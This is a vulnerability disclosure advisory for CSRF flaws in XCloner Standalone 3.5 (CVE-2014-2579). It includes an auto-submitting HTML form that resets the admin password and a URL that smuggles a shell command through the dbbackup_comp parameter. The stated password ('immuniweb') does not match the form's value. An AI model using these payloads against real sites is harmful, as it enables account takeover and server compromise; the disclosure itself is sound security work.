Advisory ID: HTB23207
Product: XCloner Standalone
Vendor: XCloner
Vulnerable Version(s): 3.5 and probably prior
Tested Version: 3.5
Advisory Publication: March 14, 2014 [without technical details]
Vendor Notification: March 14, 2014
Public Disclosure: April 9, 2014
Vulnerability Type: Cross-Site Request Forgery [CWE-352]
CVE Reference: CVE-2014-2579
Risk Level: High
CVSSv2 Base Score: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C)
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
-----------------------------------------------------------------------------------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered a vulnerability in XCloner Standalone, which can be exploited to perform Cross-Site Request Forgery (CSRF) attacks and gain complete control over the website.
1. Cross-Site Request Forgery (CSRF) in XCloner Standalone: CVE-2014-2579
1.1 The vulnerability exists due to insufficient validation of HTTP request origin. A remote attacker can trick a logged-in administrator into visiting a specially crafted webpage and change the administrator’s password.
The exploitation example below changes the password for user 'login' to 'immuniweb':
<form action="http://[host]/index2.php" method="post" name="main">
<input type="hidden" name="jcuser" value="login">
<input type="hidden" name="jcpass" value="password">
<input type="hidden" name="option" value="com_cloner">
<input type="hidden" name="task" value="config">
<input type="hidden" name="action" value="save">
<script>
document.main.submit();
</script>
</form>
1.2 The vulnerability exists due to insufficient validation of HTTP request origin. A remote attacker can trick a logged-in administrator into visiting a specially crafted webpage and execute arbitrary system commands on the vulnerable system with the privileges of the webserver.
The exploitation example below uses the 'echo' system command to write the 'immuniweb' string into the file '/var/www/file.php':
http://[host]/index2.php?option=com_cloner&task=generate&bname=1&dbbackup=1&cron_access=1&dbbackup_comp=||%20echo immuniweb > /var/www/file.php%20||
Successful exploitation of this vulnerability requires that the options 'enable_db_backup' and 'sql_mem' are enabled in the application’s configuration file.
-----------------------------------------------------------------------------------------------
Solution:
The vendor ignored:
- 6 notifications by email
- 4 notifications via contact form
- 1 notification via Twitter.
Currently we are not aware of any official solution for this vulnerability. As a temporary solution it is recommended to remove the vulnerable script or restrict access to it via a WAF or .htaccess.
-----------------------------------------------------------------------------------------------
References:
[1] High-Tech Bridge Advisory HTB23207 - https://www.htbridge.com/advisory/HTB23207 - Cross-Site Request Forgery (CSRF) in XCloner Standalone.
[2] XCloner Standalone - http://www.xcloner.com - XCloner is a professional website Backup and Restore application designed to allow you to create safe complete backups of any PHP/Mysql website and to be able to restore them anywhere. It works as a native Joomla backup component, as a native Wordpress backup plugin and also as a standalone PHP/Mysql backup application.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® - https://portal.htbridge.com/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing.
-----------------------------------------------------------------------------------------------
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.